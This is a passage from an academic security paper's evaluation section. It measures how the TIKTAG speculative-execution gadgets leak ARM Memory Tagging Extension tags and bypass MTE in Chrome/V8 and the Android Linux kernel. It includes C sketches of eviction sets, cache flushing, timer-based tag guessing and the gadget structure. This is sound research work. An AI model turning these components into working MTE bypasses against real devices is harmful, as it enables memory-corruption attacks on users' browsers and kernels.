This study shows that ARM’s Memory Tagging Extension can be reliably bypassed in Chrome and the Linux kernel through speculative tag leakage, enabling real-world attacks.

Why Hardware Memory Tagging Isn’t the Security Silver Bullet It Promised to Be

Abstract

1. Introduction

2. Background

  • Memory Tagging Extension
  • Speculative Execution Attack

3. Threat Model

4. Finding Tag Leakage Gadgets

  • Tag Leakage Template
  • Tag Leakage Fuzzing

5. TIKTAG Gadgets

  • TIKTAG-v1: Exploiting Speculation Shrinkage
  • TIKTAG-v2: Exploiting Store-to-Load Forwarding

6. Real-World Attacks

6.1. Attacking Chrome

7. Evaluation

8. Related Work

9. Conclusion and References


Evaluation

In this section, we evaluate the TIKTAG gadgets and MTE bypass exploits in two MTE-enabled systems: the Chrome browser (§7.1) and the Linux kernel (§7.2). All experiments were conducted on Google Pixel 8 devices.

7.1. Chrome Browser Tag Leakage

We evaluated the TIKTAG-v2 gadget in the V8 JavaScript engine in two environments: (i) the standalone V8 JavaScript engine and (ii) the Chromium application. The standalone V8 engine runs as an independent process, reducing interference from the Android platform. The Chromium application runs as an Android application, subject to Android's application management, such as process scheduling and thermal throttling. The experiments were conducted with the V8 v12.1.10 and Chromium v119.0.6022.0 release builds.

We leveraged the MTE random tagging schemes provided by the underlying allocators (Table 1). The standalone V8 used the Scudo allocator [3] (i.e., the Android default allocator), which supports 16 random tags and offers the OddEvenTags option. When OddEvenTags is enabled, Scudo alternates odd and even random tags for neighboring objects, preventing linear overflow (i.e., OVERFLOWTUNING). When OddEvenTags is disabled, Scudo utilizes all 16 random tags for every object to maximize tag entropy for use-after-free detection (i.e., UAFTUNING).

By default, OddEvenTags is enabled; we evaluated both settings. Upon releasing an object, Scudo assigns a new random tag that does not collide with the previous one. PartitionAlloc (i.e., the Chrome default allocator) utilizes 15 random tags and reserves the tag 0x0 for unallocated memory. When releasing an object, PartitionAlloc increments the tag by one, making the tag of the re-allocated memory address predictable. However, in real-world exploits it is challenging to precisely control the number of releases for a specific address, so we assume the attacker still needs to leak the tag after each allocation.
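
To make the two tagging policies concrete, the following C sketch models them under our own hypothetical helper names; it is an illustration of the behavior described above, not Scudo or PartitionAlloc source code. The MTE logical tag occupies bits [59:56] of the pointer.

```c
#include <stdint.h>
#include <stdlib.h>

/* Illustrative model of the tagging policies described above;
 * names are ours, not allocator code. */

/* Place a 4-bit MTE logical tag into bits [59:56] of a pointer. */
static inline void *set_tag(void *p, uint8_t tag)
{
    uintptr_t v = (uintptr_t)p & ~((uintptr_t)0xf << 56);
    return (void *)(v | ((uintptr_t)(tag & 0xf) << 56));
}

/* Scudo, UAF tuning: any of the 16 tags except the previous one. */
static uint8_t scudo_next_tag(uint8_t prev)
{
    uint8_t t;
    do { t = rand() & 0xf; } while (t == prev);
    return t;
}

/* Scudo, OddEvenTags: additionally keep the opposite parity from the
 * spatially adjacent object, so a linear overflow always hits a different tag. */
static uint8_t scudo_next_tag_odd_even(uint8_t prev, uint8_t neighbor_tag)
{
    uint8_t t;
    do { t = rand() & 0xf; } while (t == prev || (t & 1) == (neighbor_tag & 1));
    return t;
}

/* PartitionAlloc: 0x0 is reserved for unallocated memory; freeing an
 * object bumps its tag by one, wrapping within 0x1-0xf (predictable). */
static uint8_t partition_alloc_next_tag(uint8_t prev)
{
    return prev >= 0xf ? 0x1 : prev + 1;
}
```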

For the evaluation, we constructed the TIKTAG-v2 gadget in JavaScript (Figure 6) and developed MTE bypass attacks as described in §6.1.3. These attacks exploit artificial vulnerabilities designed to mimic real-world renderer vulnerabilities, specifically a linear overflow [44] and a use-after-free [42]. We developed custom JavaScript APIs to allocate, free, locate, and access renderer objects, allowing us to manipulate the memory layout and trigger the vulnerabilities. Note that our evaluation shows the best-case performance of MTE bypass attacks, since real-world renderer exploits involve additional overheads in triggering the vulnerabilities and controlling the memory layout.

V8 JavaScript Engine. In the standalone V8 JavaScript engine, we evaluated the tag leakage of the TIKTAG-v2 gadget with cache eviction and a memory-based timer. For cache eviction, we used an L1 index-based random eviction set: 500 elements for slow[0] and probe[PROBE_OFFSET], and 300 elements for victim.length. Since the eviction performance of a random eviction set varies across runs, we repeated the same test 5 times and report the best result.
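
Such an L1 index-based random eviction set can be sketched as follows. We write the sketch in C for brevity (the actual attack builds the set in JavaScript over a large buffer), and the cache-geometry constants are assumptions rather than measured values for the Pixel 8 cores.

```c
#include <stdint.h>
#include <stdlib.h>

#define LINE_SIZE  64                     /* assumed cache line size            */
#define L1_SETS    256                    /* assumed number of L1D sets         */
#define SET_STRIDE (LINE_SIZE * L1_SETS)  /* distance between same-index lines  */

/* Pick `n` random addresses from `pool` that map to the same L1 set
 * index as `victim`; traversing them probabilistically evicts the victim. */
static void build_eviction_set(uint8_t *pool, size_t pool_size,
                               const void *victim, uint8_t **set, size_t n)
{
    size_t victim_index = ((uintptr_t)victim / LINE_SIZE) % L1_SETS;
    size_t slots = pool_size / SET_STRIDE;

    for (size_t i = 0; i < n; i++) {
        size_t slot = (size_t)rand() % slots;
        set[i] = pool + slot * SET_STRIDE + victim_index * LINE_SIZE;
    }
}

/* Touch every element of the eviction set. */
static void traverse_eviction_set(uint8_t **set, size_t n)
{
    volatile uint8_t sink = 0;
    for (size_t i = 0; i < n; i++)
        sink ^= *set[i];
    (void)sink;
}
```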

The random eviction could be further optimized with eviction set algorithms [70]. We used a memory counter-based timer with a custom worker thread incrementing a counter, which is equivalent to the SharedArrayBuffer timer [58]. For every possible tag guess (i.e., 0x0-0xf), we measured the access latency of probe[PROBE_OFFSET] after running the gadget 256 times and took the guess with the minimum average access latency as the correct tag.
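
The tag-recovery loop itself is simple: try every 4-bit guess, time the probe access after each gadget run, and keep the guess with the lowest average latency. The sketch below is a C analogue of the JavaScript procedure; run_gadget, time_access, make_tagged, and probe are placeholders for the components described above.

```c
#include <stdint.h>

#define TRIALS 256   /* measurements per tag guess, as in the experiments */

/* Placeholders for the components described in the text. */
extern void     run_gadget(void *guess_ptr);             /* TIKTAG-v2 gadget run    */
extern uint64_t time_access(const volatile uint8_t *p);  /* timer-based latency     */
extern void    *make_tagged(void *p, uint8_t tag);       /* put tag in bits [59:56] */
extern volatile uint8_t *probe;                          /* probe[PROBE_OFFSET]     */

/* Return the tag guess whose probe access is fastest on average. */
static uint8_t leak_tag(void *target)
{
    uint64_t best_total = UINT64_MAX;
    uint8_t  best_tag   = 0;

    for (uint8_t guess = 0x0; guess <= 0xf; guess++) {
        uint64_t total = 0;
        for (int i = 0; i < TRIALS; i++) {
            run_gadget(make_tagged(target, guess));
            total += time_access(probe);
        }
        if (total < best_total) {
            best_total = total;
            best_tag   = guess;
        }
    }
    return best_tag;
}
```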

Table 2 summarizes the MTE bypass exploit results in V8. For a single tag leakage, the gadget was successful in all 100 runs (100%), with an average elapsed time of 3.04 seconds. MTE bypass exploits were evaluated over 100 runs for each vulnerability and OddEvenTags configuration (i.e., disabled (0) and enabled (1)). We excluded the linear overflow exploit with OddEvenTags enabled, since the memory corruption is always detected when spatially adjacent objects carry different tags, so the attack would always fail.

The results demonstrate that the attacks were successful in over 97% of the runs, with an average elapsed time of 6 to 13 seconds. In the use-after-free exploits, enabling OddEvenTags decreased the average elapsed time by around 40%, because the tag entropy drops from 16 to 8, doubling the chance of a tag collision between temporally adjacent objects.

Chromium Application. In the Chromium application setting, we evaluated the TIKTAG-v2 gadget with cache flushing and a SharedArrayBuffer-based timer. Unlike in V8, random eviction did not effectively evict cache lines, so we manually flushed the cache lines with the dc civac instruction. We attribute this to the aggressive resource management of Android, which could be addressed in the future with cache eviction algorithms tailored for mobile applications.
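
For reference, a clean-and-invalidate of a single line by virtual address with dc civac looks like the sketch below; this assumes the kernel has enabled EL0 access to the cache maintenance instruction, which the manual-flush setup relies on.

```c
/* Clean and invalidate the cache line containing `p` by virtual address.
 * Requires EL0 access to DC CIVAC (SCTLR_EL1.UCI set by the kernel). */
static inline void flush_line(const void *p)
{
    __asm__ volatile("dc civac, %0" : : "r"(p) : "memory");
    __asm__ volatile("dsb ish"      : : : "memory");
}
```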

To measure the cache eviction set overhead, we included the eviction set traversals in all experiments, using the same cache eviction configuration as in the V8 experiments. We measured access latency with a SharedArrayBuffer-based timer, as suggested by web browser speculative execution studies [8, 21]. The MTE bypass exploit experiments were conducted in the same manner as the V8 experiments. Table 3 shows the MTE bypass exploit results in the Chromium application.

The tag leakage of the TIKTAG-v2 gadget in the Chromium application was successful in 95% of 100 runs, with an average elapsed time of 2.54 seconds. For the MTE bypass exploits, success rates were over 95% for both vulnerability types, with average elapsed times of 16.11 and 21.90 seconds for the linear overflow and use-after-free, respectively.

7.2. Linux Kernel Tag Leakage

The experiments were conducted on the Android 14 kernel v5.15 with the default configuration. We used 15 random tags (i.e., 0x0–0xe) for kernel objects, as tag 0xf is commonly reserved as the access-all tag in the Linux kernel [37]. To trigger speculative execution, the cache line of the kernel address cond_ptr was evicted through cache line bouncing [25] from user space.

For cache measurement, we utilized the virtual counter (i.e., CNTVCT_EL0), which is accessible from user space, to determine a cache hit or miss with a threshold of 1.0. As the virtual counter has a lower resolution (24.5 MHz) than the CPU clock frequency (2.4-2.9 GHz), the accuracy of the cache hit rate is lower than the physical CPU counter-based measurements in §5. The access time was measured in user space or kernel space, depending on the experiment.
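
A minimal sketch of this measurement, with our own helper names: the virtual counter is read with an mrs instruction, and an access is classified as a cache hit when the counter delta stays within the threshold.

```c
#include <stdint.h>

#define HIT_THRESHOLD 1   /* counter ticks; one tick is ~41 ns at 24.5 MHz */

/* Read the generic-timer virtual counter, accessible from EL0. */
static inline uint64_t read_cntvct(void)
{
    uint64_t v;
    __asm__ volatile("isb; mrs %0, cntvct_el0" : "=r"(v) : : "memory");
    return v;
}

/* Return nonzero if loading *p looks like a cache hit. */
static int is_cache_hit(const volatile uint8_t *p)
{
    uint64_t t0 = read_cntvct();
    (void)*p;
    uint64_t t1 = read_cntvct();
    return (t1 - t0) <= HIT_THRESHOLD;
}
```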

Kernel Context Evaluation. We first evaluated whether TIKTAG gadgets can leak MTE tags in the Linux kernel context (Figure 11). We created custom system calls containing the TIKTAG-v1 (Figure 2) and TIKTAG-v2 (Figure 6) gadgets and executed them by invoking the system calls from user space. In CHECK, we accessed guess_ptr, which holds either the correct or a wrong tag Tg. In TEST, test_ptr pointed to either a kernel address or a user space address, depending on whether the cache state difference was measured in the kernel or in user space. When we leveraged a user space address as test_ptr, we passed a user buffer pointer to the kernel as a system call argument and accessed it in TEST using copy_to_user(). The user space address was flushed in user space before the system call invocation, and the cache state was measured after the system call returned.
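
The user-space side of one such measurement round can be sketched as follows; the system call number and helper names are hypothetical placeholders for the custom gadget syscalls described above, and flush_line/is_cache_hit are the dc civac and CNTVCT_EL0 helpers sketched earlier.

```c
#include <stdint.h>
#include <unistd.h>
#include <sys/syscall.h>

#define SYS_tiktag_gadget 451   /* hypothetical custom syscall number */

extern void flush_line(const void *p);               /* dc civac wrapper   */
extern int  is_cache_hit(const volatile uint8_t *p); /* CNTVCT_EL0 timing  */

static uint8_t test_buf[4096] __attribute__((aligned(4096)));

/* One round: flush the user-space test buffer, run the in-kernel gadget
 * with a tag guess, then check whether TEST (via copy_to_user) brought
 * the buffer's cache line back in. */
static int probe_tag_guess(void *guess_ptr)
{
    volatile uint8_t *test_ptr = test_buf;

    flush_line((const void *)test_ptr);               /* flush before the syscall */
    syscall(SYS_tiktag_gadget, guess_ptr, test_ptr);  /* CHECK + TEST in kernel   */
    return is_cache_hit(test_ptr);                    /* measure after it returns */
}
```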

When we used a kernel address as test_ptr, the cache flush and measurement were performed in the kernel. Each experiment measured the access time over 1000 runs. When executing TIKTAG-v1 in the kernel context, MTE tag leakage was feasible in both the kernel and user space; the user space measurement results are shown in Figure 11a.

Compared to the user space gadget evaluation (Figure 3), the kernel context required more loads in CHECK to distinguish the cache state difference. Specifically, the cache state difference was discernible from 4 loads in the kernel context, while the user space context required only 2 loads.

We attribute this to noise from the kernel-to-user-space context switch overhead; the cache hit rates of the tag-match cases were lower (i.e., under 90%) than in the user space gadget evaluation (i.e., 100%). When executing the TIKTAG-v2 gadget in the kernel space, MTE tag leakage was observed only in the kernel space (Figure 11b).

When we measured the access latency of test_ptr in user space, the gadget did not exhibit a cache state difference. Although the TIKTAG-v2 gadget might not be directly exploitable from user space, cache state amplification techniques [21, 72] could be utilized to make the difference observable from user space.

Kernel MTE Bypass Exploit. We evaluated MTE bypass exploits in the Linux kernel with two TIKTAG-v1 gadgets: an artificial TIKTAG-v1 gadget with 8 loads in CHECK (i.e., artificial) and a real-world TIKTAG-v1 gadget in snd_timer_user_read() (Figure 10). The artificial gadget evaluates the best-case performance of MTE bypass attacks, while the snd_timer_user_read() gadget demonstrates real-world exploit performance.
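
For orientation, the shape of the artificial TIKTAG-v1 gadget as described above can be sketched as follows. This is our illustration of the CHECK/TEST structure, not the paper's Figure 2 code, and the exact load pattern in CHECK is an assumption.

```c
#include <stdint.h>

#define CHECK_LOADS 8   /* the artificial gadget uses 8 loads in CHECK */

/* Illustrative TIKTAG-v1 gadget shape. cond_ptr's cache line is evicted
 * beforehand, so the branch resolves late and the body runs speculatively.
 * If the tag in guess_ptr is wrong, the speculation window shrinks and the
 * TEST load does not execute, leaving *test_ptr uncached. */
static void tiktag_v1_gadget(volatile uint64_t *cond_ptr,
                             volatile uint8_t  *guess_ptr,
                             volatile uint8_t  *test_ptr)
{
    if (*cond_ptr) {
        for (int i = 0; i < CHECK_LOADS; i++)   /* CHECK: tag-checked loads    */
            (void)*guess_ptr;
        (void)*test_ptr;                        /* TEST: observable via cache */
    }
}
```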

Both gadgets were triggered by invoking the system call containing the gadget from user space, leveraging a user space address as test_ptr and measuring the access latency of test_ptr in user space. We conducted a tag leakage attack and an MTE bypass attack for each gadget. For the MTE bypass attacks, we synthesized buffer overflow and use-after-free vulnerabilities.

Each gadget dereferenced the vulnerable pointer (i.e., guess_ptr) to trigger tag checks: an out-of-bounds pointer for the buffer overflow exploit and a dangling pointer for the use-after-free exploit. The exploit methodology followed the process described in §D.

The MTE bypass exploit results for the kernel were as follows. For a single tag leakage, the gadgets successfully leaked the correct tag in all 100 runs (100%), with an average elapsed time of 0.12 seconds for the artificial gadget and 3.38 seconds for the snd_timer_user_read() gadget. The MTE bypass exploit with the artificial TIKTAG-v1 gadget was successful in all 100 runs (100%), with an average elapsed time of 0.18 seconds.

For the MTE bypass exploit with the snd_timer_user_read() gadget, the success rate was 97% with an average elapsed time of 6.86 seconds. As the snd_timer_user_read() gadget involves complex kernel function calls and memory accesses, the performance of the MTE bypass exploit is slightly lower than with the artificial gadget. Nevertheless, it still demonstrates a high success rate within a reasonable time frame.

:::info Authors:

  1. Juhee Kim
  2. Jinbum Park
  3. Sihyeon Roh
  4. Jaeyoung Chung
  5. Youngjoo Lee
  6. Taesoo Kim
  7. Byoungyoung Lee

:::

:::info This paper is available on arxiv under CC 4.0 license.

:::

